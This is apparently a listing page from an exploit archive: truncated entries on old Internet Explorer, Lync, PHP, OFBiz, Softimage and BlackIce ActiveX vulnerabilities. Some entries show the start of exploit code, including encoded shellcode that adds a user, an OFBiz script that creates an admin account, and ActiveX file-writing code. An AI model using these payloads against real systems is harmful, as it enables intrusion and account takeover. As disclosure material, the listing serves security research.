Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9568/info A vulnerability has been reported in Microsoft Internet Explorer. Because of this, an attacker may be able to violate cross-zone policy. It has been reported that the issue presents itself due to a failure by...

Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18903/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue is triggered when an attacker convinces a victim user to visit a malicious website. Remote attackers may exploit this issue ...

Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8113/info OWA contains a vulnerability that may result in attacker-supplied script code executing within the context of the mail interface when processing e-mail containing HTML message attachments. It is possible to...

Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit

No description provided by source. html head titleVivvo CMS = 3.4 index.php Remote BLIND SQL Injection Exploit/title script type=text/javascript //'=============================================================================================== //'Script Name: Vivvo CMS = 3.4 index.php Remote BLIN...

Microsoft Internet Explorer SetMouseCapture Use-After-Free

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "Micorosft Interne...

Microsoft Lync 'User-Agent'跨站脚本执行漏洞

BUGTRAQ ID: 57300 Microsoft Lync 新一代企业整合沟通平台（前身为 Communications Server），提供了一种全新的、直观的用户体验，跨越 PC、Web、手机等其他移动设备，将不同的沟通方式集成到一个平台之中。 Microsoft Lync没有正确过滤meet.domainame.com的“User-Agent Header”，通过将JS插入到上诉参数和栈命令，攻击者可利用此漏洞在应用的上下文中执行任意命令。 0 Microsoft Lync 2010 4.0.7577.0 厂商补丁： Microsoft ---------...

Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution

Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution source: https://www.securityfocus.com/bid/57300/info Microsoft Lync is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this iss...

Internet Explorer MSXML Uninitialized Memory (MS12-043)

Exploit for windows platform in category remote exploits Title : Internet Explorer MSXML Uninitialized Memory MS12-043 Date : 2012-09-01 Auther : Senator of Pirates E-Mail : email protected FaceBook : /SenatorofPirates : /SenatorofPiratesInfo Greetz : i greet to my best friends and every Moroccan...

PHP 5.4.3 'com_print_typeinfo()'远程代码执行漏洞

PHP是一种HTML内嵌式的语言 PHP comprinttypeinfo存在一个安全漏洞，允许攻击者执行任意代码。此漏洞影响windows平台上的php版本，在windows平台上其"COM"函数作为PHP核心的一部分。攻击者需要上传恶意PHP代码到服务器，攻击者可以通过"exec"使用PHP运行SHELL命令 0 PHP 5.4.3 厂商解决方案 目前没有详细解决方案提供： http://www.php.net/ // Exploit Title: PHP 5.4 5.4.3 Code Execution 0day Win32 // Exploit author: 0in...

PHP 5.4 Win32 Code Execution

// Exploit Title: PHP 5.4 5.4.3 Code Execution 0day Win32 // Exploit author: 0in Maksymilian Motyl // Email: 0indotemailatgmail.com // Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched Polish =================== offset-brute.html...

DEDECMS recent xss 0day pass to kill all versions-bug warning-the black bar safety net

Vulnerability cause: due to Editor filter is not strict, will cause the malicious script to run. Can getshell Currently only tested on 5. 3 to 5. 7 version. Other earlier everyone is free to play. Here to talk about the use of the method. Condition 2: The 1. Open registration 2. Open submission...

Apache OFBiz - Admin Creator

Apache OFBiz - Admin Creator / Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa lucas -at- bonsai-sec.com . Bonsai Information Security http://www.bonsai-sec.com/ / var username = 'bonsaiUser'; var password = 'bonsaiPass'; var nodes =...

Apache OFBiz SQL Remote Execution PoC Payload

Exploit for multiple platform in category remote exploits ============================================= Apache OFBiz SQL Remote Execution PoC Payload ============================================= / Apache OFBiz SQL Remote Execution PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa lucas -at-...

Apache OFBiz - Admin Creator

/ Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa lucas -at- bonsai-sec.com . Bonsai Information Security http://www.bonsai-sec.com/ / var username = 'bonsaiUser'; var password = 'bonsaiPass'; var nodes = document.getElementsByClassName'fieldWidth300'; for var i=0;...

Autodesk SoftImage 7.0 Scene - .TOC File Remote Code Execution

Autodesk SoftImage 7.0 Scene - .TOC File Remote Code Execution source: https://www.securityfocus.com/bid/36637/info Autodesk Softimage is prone to a remote code-execution vulnerability. Successful exploits will allow attackers to execute arbitrary code within the context of the affected...

Autodesk SoftImage 7.0 Scene - &#039;.TOC&#039; File Remote Code Execution

source: https://www.securityfocus.com/bid/36637/info Autodesk Softimage is prone to a remote code-execution vulnerability. Successful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service...

Oracle Document Capture BlackIce Stack Buffer Overflow

var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...

Oracle - Document Capture BlackIce DEVMODE

var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...

IE Print Table of Links Cross-Zone Scripting

No description provided by source. html body 点击选项，选中打印链表列表，点打印 a href=”http://www.bl.com?zzz=dsasad script defer var ForWriting = 2; var strFile = ‘c:\test2.js’; var objFSO = new ActiveXObject’Scripting.FileSystemObject’; var objStream = objFSO.OpenTextFilestrFile,ForWriting,true,false;...

Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069

No description provided by source. html body KB955218 - CVE-2008-4029 - JA script type="text/javascript" var dom = new ActiveXObject"Msxml2.DOMDocument.3.0"; dom.async = false; var url = "http://www.milw0rm.com/forfun.dtd"; var xml = "!DOCTYPE pwn SYSTEM '" + url + "'"; if dom.loadXMLxml == 0...